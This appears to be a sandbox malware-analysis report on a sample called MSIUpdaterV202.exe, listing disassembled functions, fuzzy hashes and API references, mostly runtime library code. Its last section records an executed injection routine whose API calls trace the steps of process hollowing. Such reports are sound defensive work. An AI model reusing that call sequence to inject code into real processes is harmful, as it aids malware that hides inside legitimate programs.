Opcode ID: a7134790e41007439ac31fae6d3b11365ed7d32f36598ad4d271dcadd0629405
Instruction ID: af3e1b7b9060a08fbad9957c8ced3ada6d7a9cff8d1ffd0b82c34971432f6cb1
Opcode Fuzzy Hash: a7134790e41007439ac31fae6d3b11365ed7d32f36598ad4d271dcadd0629405
Instruction Fuzzy Hash: 0E517B7250020EABEB209FA4CC85FBF7BE9EB44754F1545A5FE05A7250DB348D18DB60

Function 00BF20F3 Relevance: 10.5, APIs: 7, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00BF20FA
std::_Lockit::_Lockit.LIBCPMT ref: 00BF2104
int.LIBCPMT ref: 00BF211B

Part of subcall function 00BF2653: std::_Lockit::_Lockit.LIBCPMT ref: 00BF2664
Part of subcall function 00BF2653: std::_Lockit::~_Lockit.LIBCPMT ref: 00BF267E

codecvt.LIBCPMT ref: 00BF213E
std::_Facet_Register.LIBCPMT ref: 00BF2155
std::_Lockit::~_Lockit.LIBCPMT ref: 00BF2175
Concurrency::cancel_current_task.LIBCPMT ref: 00BF2182

Memory Dump Source

Source File: 00000009.00000002.2188236947.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000009.00000002.2188162676.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188280990.0000000000C0D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188347039.0000000000C65000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_bf0000_MSIUpdaterV202.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
String ID:
API String ID: 2133458128-0
Opcode ID: 85608269589158f349bc34b7b42d9e16279704d5d778f9ad4daf9da11d023b59
Instruction ID: ffe541f07023d24950dadf72c16187ac7a624293c06b413e1441321393d56f01
Opcode Fuzzy Hash: 85608269589158f349bc34b7b42d9e16279704d5d778f9ad4daf9da11d023b59
Instruction Fuzzy Hash: 2B01C43190011D9BCB05EB64C8557BE77E2EF84720F140488F71167292CFB59F09C791

Function 00BF2188 Relevance: 10.5, APIs: 7, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00BF218F
std::_Lockit::_Lockit.LIBCPMT ref: 00BF2199
int.LIBCPMT ref: 00BF21B0

Part of subcall function 00BF2653: std::_Lockit::_Lockit.LIBCPMT ref: 00BF2664
Part of subcall function 00BF2653: std::_Lockit::~_Lockit.LIBCPMT ref: 00BF267E

ctype.LIBCPMT ref: 00BF21D3
std::_Facet_Register.LIBCPMT ref: 00BF21EA
std::_Lockit::~_Lockit.LIBCPMT ref: 00BF220A
Concurrency::cancel_current_task.LIBCPMT ref: 00BF2217

Memory Dump Source

Source File: 00000009.00000002.2188236947.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000009.00000002.2188162676.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188280990.0000000000C0D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188347039.0000000000C65000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_bf0000_MSIUpdaterV202.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registerctype
String ID:
API String ID: 2958136301-0
Opcode ID: 1fdce5637c28c485bfac6569616d421687c3ed9b64f0b4f9b3ca7b08fc8f2654
Instruction ID: 58817003e76b4eb8cce64b8e05a34d89e3c15457658fde9ccc629b66fe0999cd
Opcode Fuzzy Hash: 1fdce5637c28c485bfac6569616d421687c3ed9b64f0b4f9b3ca7b08fc8f2654
Instruction Fuzzy Hash: 5B01D23190011D9BCB05EFA4C856BBEB7F1EF84710F240488E611AB292CFB49F09CB91

Function 00BF787A Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00BF7871,00BF5E40,00BF4F12), ref: 00BF7888
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00BF7896
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00BF78AF
SetLastError.KERNEL32(00000000,00BF7871,00BF5E40,00BF4F12), ref: 00BF7901

Memory Dump Source

Source File: 00000009.00000002.2188236947.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000009.00000002.2188162676.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188280990.0000000000C0D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188347039.0000000000C65000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_bf0000_MSIUpdaterV202.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: b7e881887900a84b28bccdd60e7630cd4f036f1c38b0ee550ecfe386350abbe2
Instruction ID: b3fd671e3140a5b2c85ed47e0c76dafb902c6bc9a5d2f90ae40192d293421ef7
Opcode Fuzzy Hash: b7e881887900a84b28bccdd60e7630cd4f036f1c38b0ee550ecfe386350abbe2
Instruction Fuzzy Hash: 8A01F53221C62D6EA62416FA7C8977E2AD4EF013B473002EAF724871E0EF924C199141

Function 00BFC13F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,34A80F21,?,?,00000000,00C0B0F9,000000FF,?,00BFC0CF,?,?,00BFC0A3,00000000), ref: 00BFC174
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00BFC186
FreeLibrary.KERNEL32(00000000,?,00000000,00C0B0F9,000000FF,?,00BFC0CF,?,?,00BFC0A3,00000000), ref: 00BFC1A8

Strings

CorExitProcess, xrefs: 00BFC17E
mscoree.dll, xrefs: 00BFC16D

Memory Dump Source

Source File: 00000009.00000002.2188236947.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000009.00000002.2188162676.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188280990.0000000000C0D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188347039.0000000000C65000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_bf0000_MSIUpdaterV202.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 109de34f6994d419978a503348e5beb6f14ff28fb26cc76f371f99b1827eb021
Instruction ID: f74525d1b423761aa6c52582720b2f5372db87a5c2e0a084ee275ed0f3c7d72c
Opcode Fuzzy Hash: 109de34f6994d419978a503348e5beb6f14ff28fb26cc76f371f99b1827eb021
Instruction Fuzzy Hash: D901A27194466DAFDB119F94CC05BBEBBB8FB04B14F01012AF916A26E0DB759940CA90

Function 00C029E1 Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00C02A68
__alloca_probe_16.LIBCMT ref: 00C02B29
__freea.LIBCMT ref: 00C02B90

Part of subcall function 00C01DC1: HeapAlloc.KERNEL32(00000000,00BF1FA6,?,?,00BF57EA,?,?,?,00000000,?,00BF17E2,00BF1FA6,?,?,?,?), ref: 00C01DF3

__freea.LIBCMT ref: 00C02BA5
__freea.LIBCMT ref: 00C02BB5

Memory Dump Source

Source File: 00000009.00000002.2188236947.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000009.00000002.2188162676.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188280990.0000000000C0D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188347039.0000000000C65000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_bf0000_MSIUpdaterV202.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: 4cae927cb3748f8cf337ba360d07db4622a6b5bd108b3b0796524cdfd4e8a18d
Instruction ID: a19dc8d0c9747416ff0adea9b97deeae143dca443de3da1efbe00da1d65980d2
Opcode Fuzzy Hash: 4cae927cb3748f8cf337ba360d07db4622a6b5bd108b3b0796524cdfd4e8a18d
Instruction Fuzzy Hash: 1351D37260021AAFEF259F65CC89EBB7BA9EF44710B150168FD15E7280EB71CE50D760

Function 00BF3BCF Relevance: 7.5, APIs: 5, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00BF3BD6
std::_Lockit::_Lockit.LIBCPMT ref: 00BF3BE1
std::_Lockit::~_Lockit.LIBCPMT ref: 00BF3C4F

Part of subcall function 00BF3D32: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00BF3D4A

std::locale::_Setgloballocale.LIBCPMT ref: 00BF3BFC
_Yarn.LIBCPMT ref: 00BF3C12

Memory Dump Source

Source File: 00000009.00000002.2188236947.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000009.00000002.2188162676.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188280990.0000000000C0D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188347039.0000000000C65000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_bf0000_MSIUpdaterV202.jbxd

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 1088826258-0
Opcode ID: 7ce18b14ac24efb152850de30c6e719fe955cdcbfc9babad415957fda079f31e
Instruction ID: 62d900e0e6d1472ac4aaf202998ab925ba7a93e7ee4ef2b92586a07ab3088166
Opcode Fuzzy Hash: 7ce18b14ac24efb152850de30c6e719fe955cdcbfc9babad415957fda079f31e
Instruction Fuzzy Hash: CD01BC75A002599BCB06EB60C85563C7BF1FF84B00B140089EA0257392CFB4AF0ACB89

Function 00BF2391 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00BF2398
std::_Lockit::_Lockit.LIBCPMT ref: 00BF23A5
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00BF23E2

Part of subcall function 00BF3CCD: _Yarn.LIBCPMT ref: 00BF3CEC
Part of subcall function 00BF3CCD: _Yarn.LIBCPMT ref: 00BF3D10

Strings

bad locale name, xrefs: 00BF23F3

Memory Dump Source

Source File: 00000009.00000002.2188236947.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000009.00000002.2188162676.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188280990.0000000000C0D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188347039.0000000000C65000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_bf0000_MSIUpdaterV202.jbxd

Similarity

API ID: Yarnstd::_$H_prolog3Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 482894088-1405518554
Opcode ID: 8316c588f466da2350a7eabc363b23caaed2945f9517328451b9938db5a8e83e
Instruction ID: 8d50dbec47f8e21eb2d365f2cedf5ef801707da0c508d35e5e19fc58cd48b8f3
Opcode Fuzzy Hash: 8316c588f466da2350a7eabc363b23caaed2945f9517328451b9938db5a8e83e
Instruction Fuzzy Hash: EA01C4B1500748DEC7209F6A844045BFEE0FF28350750896FE28DC7B01C7709608CBA9

Function 00BF89C2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00C14FF0,00000000,00000800,?,00BF8973,00000000,?,00000000,?,?,?,00BF8A9D,00000002,FlsGetValue,00C0EC68,FlsGetValue), ref: 00BF89CF
GetLastError.KERNEL32(?,00BF8973,00000000,?,00000000,?,?,?,00BF8A9D,00000002,FlsGetValue,00C0EC68,FlsGetValue,00000000,?,00BF792D), ref: 00BF89D9
LoadLibraryExW.KERNEL32(00C14FF0,00000000,00000000,?,00C14FF0,?,?,?,00BF16D9,?,00BF16D9,?), ref: 00BF8A01

Strings

api-ms-, xrefs: 00BF89E6

Memory Dump Source

Source File: 00000009.00000002.2188236947.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000009.00000002.2188162676.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188280990.0000000000C0D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188347039.0000000000C65000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_bf0000_MSIUpdaterV202.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: edb2ba3daa4650bec04dce1d6192a28b28a3cd6948e9c3185bd28916177bc0a1
Instruction ID: 52d3b3a948daf9f168ecc47dfbe3928b13fc3bdfc3851e7bb79fd76bc808e8a1
Opcode Fuzzy Hash: edb2ba3daa4650bec04dce1d6192a28b28a3cd6948e9c3185bd28916177bc0a1
Instruction Fuzzy Hash: 52E04F3028020CBBEF202BA4ED0AB2C3E99EF10B54F1540B1FB0DE90E0EBA2D855D584

Function 00BFFB8E Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(34A80F21,00000000,00000000,00000000), ref: 00BFFBF1

Part of subcall function 00C03BF4: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00C02B86,?,00000000,-00000008), ref: 00C03CA0

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00BFFE4C
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00BFFE94
GetLastError.KERNEL32 ref: 00BFFF37

Memory Dump Source

Source File: 00000009.00000002.2188236947.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000009.00000002.2188162676.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188280990.0000000000C0D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188347039.0000000000C65000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_bf0000_MSIUpdaterV202.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 718d93a8f50360c85b1d9a04aaa4af92427cbb39e6561f1bf1eb263c015e411e
Instruction ID: c4af486d52635e8222d9728f7e93ba9f0cb80523ecee0dfeb2b59166e8265bd0
Opcode Fuzzy Hash: 718d93a8f50360c85b1d9a04aaa4af92427cbb39e6561f1bf1eb263c015e411e
Instruction Fuzzy Hash: 1AD16675D002599FCB15CFA8D880AFDBBF5FF09314F1841AAEA15EB292D730A846CB50

Function 00BF7991 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00BF7A58
___AdjustPointer.LIBCMT ref: 00BF7A7B
___AdjustPointer.LIBCMT ref: 00BF7B17

Memory Dump Source

Source File: 00000009.00000002.2188236947.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000009.00000002.2188162676.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188280990.0000000000C0D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188347039.0000000000C65000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_bf0000_MSIUpdaterV202.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 530de8a09d689088f7a82aeaefbbe35164b6186d47422c389e04bf8b02363e8f
Instruction ID: 85a45e80e542c7f8e61e4ae8241944524351066997dfe4c82abaa18dbeb77227
Opcode Fuzzy Hash: 530de8a09d689088f7a82aeaefbbe35164b6186d47422c389e04bf8b02363e8f
Instruction Fuzzy Hash: 8351E17164860AAFDB298F54D845BBEB7E4EF04310F1541EDEB05872A1EB71EE88C790

Function 00C04010 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 00C03BF4: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00C02B86,?,00000000,-00000008), ref: 00C03CA0

GetLastError.KERNEL32 ref: 00C04074
__dosmaperr.LIBCMT ref: 00C0407B
GetLastError.KERNEL32(?,?,?,?), ref: 00C040B5
__dosmaperr.LIBCMT ref: 00C040BC

Memory Dump Source

Source File: 00000009.00000002.2188236947.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000009.00000002.2188162676.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188280990.0000000000C0D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188347039.0000000000C65000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_bf0000_MSIUpdaterV202.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: e42accb0031095df09d34209283674debbb93858131a9a05175165d3c034abec
Instruction ID: fc63b24ed213d45494490e8a619b3d19af8a65b5322cca766de906a44cd74780
Opcode Fuzzy Hash: e42accb0031095df09d34209283674debbb93858131a9a05175165d3c034abec
Instruction Fuzzy Hash: 8221B6B1600209AFDB24AF75C881D2BB7ADEF043687108559FB39E7691DB31ED54CB50

Function 00BFB369 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2188236947.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000009.00000002.2188162676.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188280990.0000000000C0D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188347039.0000000000C65000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_bf0000_MSIUpdaterV202.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35a9627a7725e5907d6ffb719b1da7f8af917553cd2c08966afb4d262b0d1dbe
Instruction ID: 0a684be04b1d9ef9e35cfa7b79509a0b1ebc1a25f16f538d6476c58a51a5d64e
Opcode Fuzzy Hash: 35a9627a7725e5907d6ffb719b1da7f8af917553cd2c08966afb4d262b0d1dbe
Instruction Fuzzy Hash: D2216D3160020DAFDB20AFA5CD81D7BB7EDEF45364B118598FA25D7652DB30EC4897A0

Function 00C04FA6 Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00C04FAE

Part of subcall function 00C03BF4: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00C02B86,?,00000000,-00000008), ref: 00C03CA0

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00C04FE6
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00C05006

Memory Dump Source

Source File: 00000009.00000002.2188236947.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000009.00000002.2188162676.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188280990.0000000000C0D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188347039.0000000000C65000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_bf0000_MSIUpdaterV202.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 4f465fb4d2b9c8818628a76aee2a0347e49b4cf0c5b158edb76671d68a131d0d
Instruction ID: 8805834f0572256df84f4b809112c8a4e3db2315eb0a7b22b3174ebf4619c9c2
Opcode Fuzzy Hash: 4f465fb4d2b9c8818628a76aee2a0347e49b4cf0c5b158edb76671d68a131d0d
Instruction Fuzzy Hash: 7B11D6F550161A7FF72127B65C8AE7F7DACDE997A87100424F603D2181EE24CE00D9B1

Function 00C093D5 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,00C081D1,00000000,00000001,00000000,00000000,?,00BFFF8B,00000000,00000000,00000000), ref: 00C093EC
GetLastError.KERNEL32(?,00C081D1,00000000,00000001,00000000,00000000,?,00BFFF8B,00000000,00000000,00000000,00000000,00000000,?,00C00512,00000000), ref: 00C093F8

Part of subcall function 00C093BE: CloseHandle.KERNEL32(FFFFFFFE,00C09408,?,00C081D1,00000000,00000001,00000000,00000000,?,00BFFF8B,00000000,00000000,00000000,00000000,00000000), ref: 00C093CE

___initconout.LIBCMT ref: 00C09408

Part of subcall function 00C09380: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00C093AF,00C081BE,00000000,?,00BFFF8B,00000000,00000000,00000000,00000000), ref: 00C09393

WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,00C081D1,00000000,00000001,00000000,00000000,?,00BFFF8B,00000000,00000000,00000000,00000000), ref: 00C0941D

Memory Dump Source

Source File: 00000009.00000002.2188236947.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000009.00000002.2188162676.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188280990.0000000000C0D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188347039.0000000000C65000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_bf0000_MSIUpdaterV202.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: a4cd186a2ab14de4523ff36e226a0e81024af8c46ee534bc63d006f5a0ff177c
Instruction ID: 78d295bb3d2c6df1cab3be5a9d31273137ed86bf4a4e80dc80dab95f37f7d9e9
Opcode Fuzzy Hash: a4cd186a2ab14de4523ff36e226a0e81024af8c46ee534bc63d006f5a0ff177c
Instruction Fuzzy Hash: 6CF0F836401154BBCF221FE5AC08B8E3E26FB483A0F014010FA19851B1CA72C961EB91

Function 00BF7680 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 00BF76BF
__IsNonwritableInCurrentImage.LIBCMT ref: 00BF7773

Strings

csm, xrefs: 00BF775D

Memory Dump Source

Source File: 00000009.00000002.2188236947.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000009.00000002.2188162676.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188280990.0000000000C0D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188347039.0000000000C65000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_bf0000_MSIUpdaterV202.jbxd

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: c75bb833ed7d6fed771a5e21cbe51bfafb22e14692446426e31e62d2e0301313
Instruction ID: 54d50a894be441554b506439300ea49ee2c06145731bcf84987d1665a8ca1995
Opcode Fuzzy Hash: c75bb833ed7d6fed771a5e21cbe51bfafb22e14692446426e31e62d2e0301313
Instruction Fuzzy Hash: 5641C93491421DAFCF10EF69C884AAEBBF5EF45314F1480D5EA149B392DB319D09CB91

Function 00BF7F8D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?), ref: 00BF7FB2

Strings

MOC, xrefs: 00BF7FC4
RCC, xrefs: 00BF7FCC

Memory Dump Source

Source File: 00000009.00000002.2188236947.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000009.00000002.2188162676.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188280990.0000000000C0D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188300072.0000000000C17000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2188347039.0000000000C65000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_bf0000_MSIUpdaterV202.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 82d86ed04e38d40be5fe7cd77ef9ce9c300dacc8b8f0f9107e47ae48184a628b
Instruction ID: 2322b9140ddca21a3d91aa889f3f8e914d971a207e2aa1e86aba138c5f82f381
Opcode Fuzzy Hash: 82d86ed04e38d40be5fe7cd77ef9ce9c300dacc8b8f0f9107e47ae48184a628b
Instruction Fuzzy Hash: 1741257290020DAFCF15DFA4CC81AEEBBB5EF48300F598199FA04A7261DB359958DB91

Analysis Process: MSIUpdaterV202.exePID: 5012, Parent PID: 1064COMMON

Execution Graph

Execution Coverage:	97.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	6
Total number of Limit Nodes:	0

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 0109018D Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 282
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 010902FC
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0109030F
Wow64GetThreadContext.KERNEL32(?,00000000), ref: 0109032D
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01090351
VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 0109037C
WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?), ref: 010903D4
WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,00000028), ref: 0109041F
WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0109045D
Wow64SetThreadContext.KERNEL32(?,?), ref: 01090499
ResumeThread.KERNELBASE(?), ref: 010904A8

Strings

Load, xrefs: 010901CB
GetP, xrefs: 0109020F
ress, xrefs: 01090217
aryA, xrefs: 010901D3

Memory Dump Source

